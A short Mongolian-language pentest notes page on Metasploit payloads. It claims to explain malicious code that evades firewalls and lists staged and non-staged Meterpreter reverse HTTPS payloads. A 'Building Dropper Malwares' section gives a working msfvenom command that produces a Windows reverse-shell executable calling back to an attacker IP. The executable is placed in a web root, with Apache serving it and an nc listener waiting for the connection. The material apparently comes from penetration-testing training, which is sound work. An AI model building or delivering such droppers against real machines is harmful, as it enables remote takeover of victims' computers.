⚔️Payloads
Payload-н төрлүүд болон firewall-д илрэхгүй хортой коднуудын талаар тайлбарлах болно
Staged
windows/x64/meterpreter_reverse_https
Connect back to attacker and spawn a Meterpreter shell
windows/x64/meterpreter/reverse_https
Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64)
Non-staged
Building Dropper Malwares
kali@kali:~$ sudo msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.120 LPORT=444 -f exe -o /var/www/html/shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder or badchars specified, outputting raw payload Payload size: 324 bytes
kali@kali:~$ sudo service apache2 start
kali@kali:~$ sudo nc -lnvp
9001
listening on [any] 9001
-l
--> incoming connection-n
--> avoid DNS lookups-v
--> verbose output-p
--> specify the TCP port
C:\Users\Offsec\Downloads>
Last updated